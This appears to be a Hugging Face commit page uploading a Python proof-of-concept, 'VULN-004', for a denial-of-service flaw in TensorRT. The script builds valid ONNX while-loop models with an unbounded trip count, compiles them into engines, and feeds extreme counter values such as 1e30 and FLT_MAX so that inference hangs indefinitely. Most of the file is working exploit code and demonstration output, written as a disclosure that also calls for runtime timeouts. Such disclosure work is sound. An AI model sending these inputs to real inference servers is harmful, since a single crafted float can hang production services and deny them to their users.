treforbenbow commited on
Commit
b057c21
·
verified ·
1 Parent(s): 0c3443b

Upload vuln004_input_dos.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. vuln004_input_dos.py +289 -0
vuln004_input_dos.py ADDED
@@ -0,0 +1,289 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ VULN-004 PoC: TensorRT Input-Controlled Denial of Service via While-Loop Models
3
+
4
+ A structurally valid ONNX model using a condition-dependent Loop operator hangs
5
+ indefinitely during inference when given a malicious input value. The model itself
6
+ is indistinguishable from a legitimate while-loop model.
7
+
8
+ This is DISTINCT from VULN-003 (static Loop trip count):
9
+ - VULN-003: Malicious MODEL with INT64_MAX max_trip_count -> always hangs
10
+ - VULN-004: Normal MODEL + malicious INPUT -> hangs based on input value
11
+ - VULN-003 fix (validate max_trip_count at build) does NOT prevent VULN-004
12
+ - VULN-004 requires runtime protection (inference timeout / iteration budget)
13
+
14
+ Attack scenarios:
15
+ 1. Production model uses while-loop for variable-length processing
16
+ 2. Attacker sends input with extreme counter value (e.g., 1e30)
17
+ 3. Inference hangs indefinitely — DoS on the inference server
18
+ 4. Affects TensorRT-LLM (autoregressive generation uses loops)
19
+ 5. Affects any TRT model with data-dependent loop termination
20
+
21
+ Impact:
22
+ - Any TRT model using condition-dependent loops is vulnerable
23
+ - Attacker only needs to craft the INPUT, not the model
24
+ - Tiny payload (single float32 value) causes permanent hang
25
+ - No inference timeout in execute_async_v3()
26
+ """
27
+ import os
28
+ import sys
29
+ import time
30
+ import subprocess
31
+ import numpy as np
32
+ import onnx
33
+ from onnx import helper, TensorProto, numpy_helper
34
+
35
+ POC_DIR = os.path.dirname(os.path.abspath(__file__))
36
+
37
+
38
def create_while_loop_model():
    """Create a LEGITIMATE while-loop model that counts down a counter.

    This is a common pattern in ML models for variable-length processing:
    each iteration subtracts 1.0 from the carried value and the loop keeps
    running while the value is still > 0.  With a benign counter (e.g. 10)
    the loop runs 10 iterations and returns 0; with a hostile counter
    (e.g. 1e30) the very same engine spins for an astronomical time.

    Returns:
        onnx.ModelProto: opset-13 model containing one Loop node whose
        max_trip_count initializer is INT64_MAX, so termination is purely
        condition (i.e. input) driven.
    """
    scalar = []  # rank-0 tensor shape used by every value below

    # Loop body: x_out = x_in - 1.0, then cond_out = (x_out > 0.0).
    decrement = helper.make_node('Sub', ['x_in', 'one'], ['x_out'])
    still_positive = helper.make_node('Greater', ['x_out', 'zero'], ['cond_out'])

    body = helper.make_graph(
        [decrement, still_positive],
        'while_body',
        # Loop body signature: iteration index, incoming condition, carried value.
        [
            helper.make_tensor_value_info('i', TensorProto.INT64, scalar),
            helper.make_tensor_value_info('cond_in', TensorProto.BOOL, scalar),
            helper.make_tensor_value_info('x_in', TensorProto.FLOAT, scalar),
        ],
        [
            helper.make_tensor_value_info('cond_out', TensorProto.BOOL, scalar),
            helper.make_tensor_value_info('x_out', TensorProto.FLOAT, scalar),
        ],
        [
            numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'one'),
            numpy_helper.from_array(np.array(0.0, dtype=np.float32), 'zero'),
        ],
    )

    # Main graph I/O: one float scalar in, one float scalar out.
    counter_info = helper.make_tensor_value_info('counter', TensorProto.FLOAT, scalar)
    output_info = helper.make_tensor_value_info('output', TensorProto.FLOAT, scalar)

    # max_trip_count is INT64_MAX but the loop is expected to terminate via
    # the condition — exactly what makes this model input-controlled.
    trip_limit = numpy_helper.from_array(
        np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
    )
    start_cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')

    loop_node = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'counter'], ['output'], body=body
    )

    graph = helper.make_graph(
        [loop_node], 'while_loop', [counter_info], [output_info],
        [trip_limit, start_cond]
    )
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    model.ir_version = 7
    return model
83
+
84
+
85
def create_accumulator_model():
    """A more realistic model: accumulates values until threshold is reached.

    Simulates a model that processes elements until a running sum exceeds a
    target.  With a normal input (target=100) the loop terminates quickly;
    with a malicious input (target=1e38) it hangs effectively forever.

    Returns:
        onnx.ModelProto: opset-13 model with one Loop node carrying two
        state variables (the accumulator and a pass-through target) whose
        max_trip_count initializer is INT64_MAX.
    """
    scalar = []  # rank-0 tensor shape shared by every value below

    # Loop body: acc_out = acc_in + step, then cond_out = (acc_out < target_in).
    add_step = helper.make_node('Add', ['acc_in', 'step'], ['acc_out'])
    below_target = helper.make_node('Less', ['acc_out', 'target_in'], ['cond_out'])

    body = helper.make_graph(
        [add_step, below_target],
        'accum_body',
        # Body signature: index, incoming condition, two carried values.
        [
            helper.make_tensor_value_info('i', TensorProto.INT64, scalar),
            helper.make_tensor_value_info('cond_in', TensorProto.BOOL, scalar),
            helper.make_tensor_value_info('acc_in', TensorProto.FLOAT, scalar),
            helper.make_tensor_value_info('target_in', TensorProto.FLOAT, scalar),
        ],
        # target_in is re-emitted unchanged so it stays a loop-carried value.
        [
            helper.make_tensor_value_info('cond_out', TensorProto.BOOL, scalar),
            helper.make_tensor_value_info('acc_out', TensorProto.FLOAT, scalar),
            helper.make_tensor_value_info('target_in', TensorProto.FLOAT, scalar),
        ],
        [numpy_helper.from_array(np.array(1.0, dtype=np.float32), 'step')],
    )

    graph_inputs = [
        helper.make_tensor_value_info('init_value', TensorProto.FLOAT, scalar),
        helper.make_tensor_value_info('target', TensorProto.FLOAT, scalar),
    ]
    graph_outputs = [
        helper.make_tensor_value_info('final_acc', TensorProto.FLOAT, scalar),
        helper.make_tensor_value_info('target_passthrough', TensorProto.FLOAT, scalar),
    ]

    # Unbounded trip count: only the Less condition can stop the loop.
    trip_limit = numpy_helper.from_array(
        np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
    )
    start_cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')

    loop_node = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'init_value', 'target'],
        ['final_acc', 'target_passthrough'],
        body=body
    )

    graph = helper.make_graph(
        [loop_node], 'accumulator',
        graph_inputs,
        graph_outputs,
        [trip_limit, start_cond]
    )
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
    model.ir_version = 7
    return model
135
+
136
+
137
def build_engine(model_path, engine_path):
    """Build a TensorRT engine from an ONNX model and write it to disk.

    Args:
        model_path: path of the .onnx file to parse.
        engine_path: destination path for the serialized engine.

    Returns:
        bool: True when the engine was built and written; False on a
        parse or build failure (diagnostics are printed, not raised).
    """
    import tensorrt as trt  # local import: only needed when building

    trt_logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(trt_logger)
    creation_flags = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    network = builder.create_network(creation_flags)
    parser = trt.OnnxParser(network, trt_logger)

    # Surface every parser diagnostic before bailing out.
    if not parser.parse_from_file(model_path):
        for err_idx in range(parser.num_errors):
            print(f" Parse error: {parser.get_error(err_idx)}")
        return False

    config = builder.create_builder_config()
    # 16 MiB workspace is plenty for these tiny scalar-loop graphs.
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)

    plan = builder.build_serialized_network(network, config)
    if not plan:
        print(" Build failed")
        return False

    with open(engine_path, 'wb') as out_file:
        out_file.write(bytes(plan))
    return True
164
+
165
+
166
+ def test_inference(engine_path, counter_value, timeout=15):
167
+ """Run inference with a specific counter value."""
168
+ script = f'''
169
+ import tensorrt as trt, torch, sys, time
170
+
171
+ with open(r"{engine_path}", "rb") as f:
172
+ data = f.read()
173
+
174
+ logger = trt.Logger(trt.Logger.ERROR)
175
+ runtime = trt.Runtime(logger)
176
+ engine = runtime.deserialize_cuda_engine(data)
177
+ if not engine:
178
+ print("DESER_FAIL"); sys.exit(1)
179
+
180
+ context = engine.create_execution_context()
181
+ device = torch.device("cuda:0")
182
+
183
+ counter = torch.tensor({counter_value}, dtype=torch.float32, device=device)
184
+ output = torch.empty(1, dtype=torch.float32, device=device)
185
+
186
+ context.set_tensor_address("counter", counter.data_ptr())
187
+ context.set_tensor_address("output", output.data_ptr())
188
+
189
+ stream = torch.cuda.current_stream()
190
+ print("INFERENCE_STARTED")
191
+ sys.stdout.flush()
192
+ start = time.time()
193
+ context.execute_async_v3(stream.cuda_stream)
194
+ stream.synchronize()
195
+ elapsed = time.time() - start
196
+ print(f"DONE time={{elapsed:.3f}}s output={{output.item():.1f}}")
197
+ '''
198
+ start = time.time()
199
+ try:
200
+ r = subprocess.run(
201
+ [sys.executable, "-c", script],
202
+ capture_output=True, text=True, timeout=timeout
203
+ )
204
+ elapsed = time.time() - start
205
+ return False, elapsed, r.stdout.strip(), r.returncode
206
+ except subprocess.TimeoutExpired:
207
+ elapsed = time.time() - start
208
+ return True, elapsed, "TIMEOUT", -1
209
+
210
+
211
def main():
    """End-to-end PoC: build a valid while-loop engine, show benign inputs
    complete instantly, then show malicious input values hang inference."""
    print("=" * 70)
    print("VULN-004: Input-Controlled DoS via While-Loop Models")
    print("=" * 70)

    # Step 1: Create the while-loop model and serialize it next to this script.
    # (create_accumulator_model is defined above but not exercised here.)
    model = create_while_loop_model()
    onnx_path = os.path.join(POC_DIR, "while_loop.onnx")
    with open(onnx_path, 'wb') as f:
        f.write(model.SerializeToString())

    onnx_size = os.path.getsize(onnx_path)
    print(f"\n[1] While-loop ONNX model: {onnx_path}")
    print(f" Size: {onnx_size} bytes")
    print(f" Behavior: Counts down from input value to 0")
    print(f" Structure: Perfectly valid -- common ML pattern")

    # Step 2: Build TensorRT engine. A successful build demonstrates the
    # model passes all structural validation — the DoS is purely input-driven.
    engine_path = os.path.join(POC_DIR, "while_loop.engine")
    print(f"\n[2] Building TensorRT engine...")
    if not build_engine(onnx_path, engine_path):
        print(" ERROR: Build failed")
        sys.exit(1)

    engine_size = os.path.getsize(engine_path)
    print(f" Engine: {engine_path}")
    print(f" Size: {engine_size} bytes")
    print(f" Build completed normally -- model is structurally valid")

    # Step 3: Normal usage (benign inputs) — each should finish well inside
    # the 10 s child-process timeout.
    print(f"\n[3] Normal inference with benign inputs")
    for counter_val in [10, 100, 1000]:
        hung, elapsed, out, rc = test_inference(engine_path, float(counter_val), timeout=10)
        lines = out.split('\n')
        # Last stdout line is either the DONE summary or an error marker.
        result = lines[-1] if lines else f"rc={rc}"
        print(f" counter={counter_val:>6d}: {result} ({elapsed:.2f}s)")

    # Step 4: DoS attack (malicious input) — same engine, hostile counter
    # values. NOTE(review): `desc` is currently unused in the loop body.
    print(f"\n[4] DoS attack with malicious inputs")
    for counter_val, desc in [
        (1e6, "1 million iterations"),
        (1e9, "1 billion iterations"),
        (1e15, "1 quadrillion iterations"),
        (1e30, "1e30 iterations (astronomical)"),
        (3.4e38, "FLT_MAX iterations (maximum float32)"),
    ]:
        hung, elapsed, out, rc = test_inference(engine_path, counter_val, timeout=15)
        if hung:
            print(f" counter={counter_val:>12.0e}: TIMEOUT after {elapsed:.1f}s — HANGING")
        else:
            lines = out.split('\n')
            result = lines[-1] if lines else f"rc={rc}"
            print(f" counter={counter_val:>12.0e}: {result} ({elapsed:.1f}s)")

    # Step 5: Show the attack is input-dependent
    print(f"\n[5] Same model, same engine — behavior depends entirely on input")
    print(f" counter=10 -> completes instantly (10 iterations)")
    print(f" counter=1e30 -> hangs for 1e30 iterations")
    print(f" At 1 billion iterations/sec: 3.17e13 YEARS")

    # Summary
    print(f"\n{'='*70}")
    print("VULNERABILITY SUMMARY")
    print(f"{'='*70}")
    print(f"[!!!] Input-controlled DoS via while-loop model")
    print(f"[!!!] Model is structurally VALID — cannot be detected by static analysis")
    print(f"[!!!] ONNX size: {onnx_size} bytes | Engine size: {engine_size} bytes")
    print(f"[!!!] DoS triggered by input value, NOT by model structure")
    print(f"[!!!] VULN-003 fix (validate max_trip_count) does NOT prevent this")
    print(f"[!!!] Requires runtime protection: inference timeout / iteration budget")
    print(f"[!!!] Affects any TRT model using data-dependent loops")
    print(f"[!!!] Relevant to TensorRT-LLM autoregressive generation")

    # Cleanup temp files
    # Keep the while_loop files as evidence
286
+
287
+
288
# Script entry point: run the full PoC when executed directly.
if __name__ == "__main__":
    main()